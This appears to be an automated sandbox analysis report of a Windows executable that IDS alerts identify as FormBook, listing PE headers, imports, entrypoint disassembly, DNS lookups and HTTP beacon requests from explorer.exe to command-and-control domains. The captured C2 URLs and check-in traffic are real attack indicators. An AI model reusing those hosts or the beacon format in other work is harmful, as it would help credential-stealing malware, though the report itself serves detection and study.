                                                                                  SSDEEP:6144:Ds9X42rPo+wjZXJIl/tDiOnQeahYOaqMn6YaFjYJ6VJAl:yv0+wjZXI/tDZnQeahYgMoacJAl
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                  File Icon

                                                                                  Icon Hash:b2a88c96b2ca6a72

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x40323c
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:099c0646ea7282d232219f8807883be0

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  sub esp, 00000180h
                                                                                  push ebx
                                                                                  push ebp
                                                                                  push esi
                                                                                  xor ebx, ebx
                                                                                  push edi
                                                                                  mov dword ptr [esp+18h], ebx
                                                                                  mov dword ptr [esp+10h], 00409130h
                                                                                  xor esi, esi
                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                  call dword ptr [00407030h]
                                                                                  push 00008001h
                                                                                  call dword ptr [004070B4h]
                                                                                  push ebx
                                                                                  call dword ptr [0040727Ch]
                                                                                  push 00000008h
                                                                                  mov dword ptr [00423F58h], eax
                                                                                  call 00007FD70C8EB8FEh
                                                                                  mov dword ptr [00423EA4h], eax
                                                                                  push ebx
                                                                                  lea eax, dword ptr [esp+34h]
                                                                                  push 00000160h
                                                                                  push eax
                                                                                  push ebx
                                                                                  push 0041F458h
                                                                                  call dword ptr [00407158h]
                                                                                  push 004091B8h
                                                                                  push 004236A0h
                                                                                  call 00007FD70C8EB5B1h
                                                                                  call dword ptr [004070B0h]
                                                                                  mov edi, 00429000h
                                                                                  push eax
                                                                                  push edi
                                                                                  call 00007FD70C8EB59Fh
                                                                                  push ebx
                                                                                  call dword ptr [0040710Ch]
                                                                                  cmp byte ptr [00429000h], 00000022h
                                                                                  mov dword ptr [00423EA0h], eax
                                                                                  mov eax, edi
                                                                                  jne 00007FD70C8E8CFCh
                                                                                  mov byte ptr [esp+14h], 00000022h
                                                                                  mov eax, 00429001h
                                                                                  push dword ptr [esp+14h]
                                                                                  push eax
                                                                                  call 00007FD70C8EB092h
                                                                                  push eax
                                                                                  call dword ptr [0040721Ch]
                                                                                  mov dword ptr [esp+1Ch], eax
                                                                                  jmp 00007FD70C8E8D55h
                                                                                  cmp cl, 00000020h
                                                                                  jne 00007FD70C8E8CF8h
                                                                                  inc eax
                                                                                  cmp byte ptr [eax], 00000020h
                                                                                  je 00007FD70C8E8CECh
                                                                                  cmp byte ptr [eax], 00000022h
                                                                                  mov byte ptr [eax+eax+00h], 00000000h

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x9e0.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                  .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x2c0000x9e00xa00False0.45625data4.51012867721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountry
                                                                                  RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                  RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                  RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                  RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                  RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                  RT_MANIFEST0x2c7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                  Imports

                                                                                  DLLImport
                                                                                  KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                  USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                  SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                  ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                  VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                  06/11/21-12:17:03.163397TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.335.169.40.107
                                                                                  06/11/21-12:17:03.163397TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.335.169.40.107
                                                                                  06/11/21-12:17:03.163397TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.335.169.40.107

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jun 11, 2021 12:16:23.536871910 CEST4972880192.168.2.3163.44.239.72
                                                                                  Jun 11, 2021 12:16:23.843411922 CEST8049728163.44.239.72192.168.2.3
                                                                                  Jun 11, 2021 12:16:23.843518019 CEST4972880192.168.2.3163.44.239.72
                                                                                  Jun 11, 2021 12:16:23.843692064 CEST4972880192.168.2.3163.44.239.72
                                                                                  Jun 11, 2021 12:16:24.149818897 CEST8049728163.44.239.72192.168.2.3
                                                                                  Jun 11, 2021 12:16:24.199903965 CEST8049728163.44.239.72192.168.2.3
                                                                                  Jun 11, 2021 12:16:24.199930906 CEST8049728163.44.239.72192.168.2.3
                                                                                  Jun 11, 2021 12:16:24.200057030 CEST4972880192.168.2.3163.44.239.72
                                                                                  Jun 11, 2021 12:16:24.200103045 CEST4972880192.168.2.3163.44.239.72
                                                                                  Jun 11, 2021 12:16:24.508001089 CEST8049728163.44.239.72192.168.2.3
                                                                                  Jun 11, 2021 12:16:42.529468060 CEST4973580192.168.2.3199.59.242.153
                                                                                  Jun 11, 2021 12:16:42.655133963 CEST8049735199.59.242.153192.168.2.3
                                                                                  Jun 11, 2021 12:16:42.655319929 CEST4973580192.168.2.3199.59.242.153
                                                                                  Jun 11, 2021 12:16:42.655631065 CEST4973580192.168.2.3199.59.242.153
                                                                                  Jun 11, 2021 12:16:42.782591105 CEST8049735199.59.242.153192.168.2.3
                                                                                  Jun 11, 2021 12:16:42.782979965 CEST8049735199.59.242.153192.168.2.3
                                                                                  Jun 11, 2021 12:16:42.783025026 CEST8049735199.59.242.153192.168.2.3
                                                                                  Jun 11, 2021 12:16:42.783066988 CEST8049735199.59.242.153192.168.2.3
                                                                                  Jun 11, 2021 12:16:42.783102036 CEST8049735199.59.242.153192.168.2.3
                                                                                  Jun 11, 2021 12:16:42.783154964 CEST8049735199.59.242.153192.168.2.3
                                                                                  Jun 11, 2021 12:16:42.783488035 CEST4973580192.168.2.3199.59.242.153
                                                                                  Jun 11, 2021 12:16:42.783581018 CEST4973580192.168.2.3199.59.242.153
                                                                                  Jun 11, 2021 12:17:03.026878119 CEST4973780192.168.2.335.169.40.107
                                                                                  Jun 11, 2021 12:17:03.163161039 CEST804973735.169.40.107192.168.2.3
                                                                                  Jun 11, 2021 12:17:03.163240910 CEST4973780192.168.2.335.169.40.107
                                                                                  Jun 11, 2021 12:17:03.163397074 CEST4973780192.168.2.335.169.40.107
                                                                                  Jun 11, 2021 12:17:03.298722029 CEST804973735.169.40.107192.168.2.3
                                                                                  Jun 11, 2021 12:17:03.300910950 CEST804973735.169.40.107192.168.2.3
                                                                                  Jun 11, 2021 12:17:03.300970078 CEST804973735.169.40.107192.168.2.3
                                                                                  Jun 11, 2021 12:17:03.301126003 CEST4973780192.168.2.335.169.40.107
                                                                                  Jun 11, 2021 12:17:03.301196098 CEST4973780192.168.2.335.169.40.107
                                                                                  Jun 11, 2021 12:17:03.436517954 CEST804973735.169.40.107192.168.2.3

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jun 11, 2021 12:15:04.338283062 CEST5128153192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:04.389538050 CEST53512818.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:05.260799885 CEST4919953192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:05.315190077 CEST53491998.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:06.089658976 CEST5062053192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:06.163535118 CEST53506208.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:06.169666052 CEST6493853192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:06.220799923 CEST53649388.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:07.288958073 CEST6015253192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:07.350446939 CEST53601528.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:08.466469049 CEST5754453192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:08.516527891 CEST53575448.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:09.876652956 CEST5598453192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:09.926764011 CEST53559848.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:10.876298904 CEST6418553192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:10.927905083 CEST53641858.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:11.947916985 CEST6511053192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:12.000762939 CEST53651108.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:13.128879070 CEST5836153192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:13.178880930 CEST53583618.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:14.212207079 CEST6349253192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:14.266834974 CEST53634928.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:15.463897943 CEST6083153192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:15.516990900 CEST53608318.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:18.343035936 CEST6010053192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:18.404768944 CEST53601008.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:19.278172970 CEST5319553192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:19.338288069 CEST53531958.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:20.235135078 CEST5014153192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:20.294764042 CEST53501418.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:21.261132956 CEST5302353192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:21.313108921 CEST53530238.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:22.343024015 CEST4956353192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:22.393543959 CEST53495638.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:23.272404909 CEST5135253192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:23.322529078 CEST53513528.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:24.404251099 CEST5934953192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:24.454335928 CEST53593498.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:26.621176958 CEST5708453192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:26.679791927 CEST53570848.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:41.593122005 CEST5882353192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:41.657627106 CEST53588238.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:42.910631895 CEST5756853192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:42.977174044 CEST53575688.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:59.618515015 CEST5054053192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:59.681492090 CEST53505408.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:16:23.210164070 CEST5436653192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:16:23.531155109 CEST53543668.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:16:26.947351933 CEST5303453192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:16:27.024327040 CEST53530348.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:16:31.609294891 CEST5776253192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:16:31.671394110 CEST53577628.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:16:42.383477926 CEST5543553192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:16:42.527309895 CEST53554358.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:17:02.240250111 CEST5071353192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:17:02.299516916 CEST53507138.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:17:02.963282108 CEST5613253192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:17:03.025981903 CEST53561328.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:17:03.959834099 CEST5898753192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:17:04.012559891 CEST53589878.8.8.8192.168.2.3

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  Jun 11, 2021 12:16:23.210164070 CEST192.168.2.38.8.8.80xdea6Standard query (0)www.mekarauroko7389.comA (IP address)IN (0x0001)
                                                                                  Jun 11, 2021 12:16:42.383477926 CEST192.168.2.38.8.8.80x7059Standard query (0)www.oklahomasundayschool.comA (IP address)IN (0x0001)
                                                                                  Jun 11, 2021 12:17:02.963282108 CEST192.168.2.38.8.8.80x487eStandard query (0)www.shamushalkowich.comA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  Jun 11, 2021 12:16:23.531155109 CEST8.8.8.8192.168.2.30xdea6No error (0)www.mekarauroko7389.commekarauroko7389.comCNAME (Canonical name)IN (0x0001)
                                                                                  Jun 11, 2021 12:16:23.531155109 CEST8.8.8.8192.168.2.30xdea6No error (0)mekarauroko7389.com163.44.239.72A (IP address)IN (0x0001)
                                                                                  Jun 11, 2021 12:16:42.527309895 CEST8.8.8.8192.168.2.30x7059No error (0)www.oklahomasundayschool.com199.59.242.153A (IP address)IN (0x0001)
                                                                                  Jun 11, 2021 12:17:03.025981903 CEST8.8.8.8192.168.2.30x487eNo error (0)www.shamushalkowich.com35.169.40.107A (IP address)IN (0x0001)
                                                                                  Jun 11, 2021 12:17:03.025981903 CEST8.8.8.8192.168.2.30x487eNo error (0)www.shamushalkowich.com34.225.31.148A (IP address)IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • www.mekarauroko7389.com
                                                                                  • www.oklahomasundayschool.com
                                                                                  • www.shamushalkowich.com

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.349728163.44.239.7280C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Jun 11, 2021 12:16:23.843692064 CEST1312OUTGET /ccr/?FJB=DYL3Mol3r87Z8qId+4Ycjijbq71Py48wOU/SaqdUDZ5D3FcnOOzajI1IKd683KRXh37z&v0=JDK8Zp HTTP/1.1
                                                                                  Host: www.mekarauroko7389.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Jun 11, 2021 12:16:24.199903965 CEST1312INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  X-Redirect-By: WordPress
                                                                                  Location: http://mekarauroko7389.com/ccr/?FJB=DYL3Mol3r87Z8qId+4Ycjijbq71Py48wOU/SaqdUDZ5D3FcnOOzajI1IKd683KRXh37z&v0=JDK8Zp
                                                                                  Content-Length: 0
                                                                                  Date: Fri, 11 Jun 2021 10:16:24 GMT
                                                                                  Server: LiteSpeed


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  1192.168.2.349735199.59.242.15380C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Jun 11, 2021 12:16:42.655631065 CEST4356OUTGET /ccr/?FJB=AxjKtjbRfNJtNPnejOfQjb3R2KRHRMY2w4U1+yq2aSZlRtrxzdj5Yr2imIB9O7nqKvHd&v0=JDK8Zp HTTP/1.1
                                                                                  Host: www.oklahomasundayschool.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Jun 11, 2021 12:16:42.782979965 CEST4357INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Fri, 11 Jun 2021 10:16:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vatn3a84pvnuSV6HpSdXujsD77dVpc8NaTDjwR2I8GziSjJv4kODxMEpyJ0MBmLV052jHZUkvSsgoxUB/N1esw==
                                                                                  Data Raw: 66 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 61 74 6e 33 61 38 34 70 76 6e 75 53 56 36 48 70 53 64 58 75 6a 73 44 37 37 64 56 70 63 38 4e 61 54 44 6a 77 52 32 49 38 47 7a 69 53 6a 4a 76 34 6b 4f 44 78 4d 45 70 79 4a 30 4d 42 6d 4c 56 30 35 32 6a 48 5a 55 6b 76 53 73 67 6f 78 55 42 2f 4e 31 65 73 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                                  Data Ascii: ff9<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vatn3a84pvnuSV6HpSdXujsD77dVpc8NaTDjwR2I8GziSjJv4kODxMEpyJ0MBmLV052jHZUkvSsgoxUB/N1esw=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  2192.168.2.34973735.169.40.10780C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Jun 11, 2021 12:17:03.163397074 CEST4371OUTGET /ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRevKVZrdd8Pf&v0=JDK8Zp HTTP/1.1
                                                                                  Host: www.shamushalkowich.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Jun 11, 2021 12:17:03.300910950 CEST4371INHTTP/1.1 301 Moved Permanently
                                                                                  Server: openresty
                                                                                  Date: Fri, 11 Jun 2021 10:17:03 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 166
                                                                                  Connection: close
                                                                                  Location: https://www.shamushalkowich.com/ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRevKVZrdd8Pf&v0=JDK8Zp
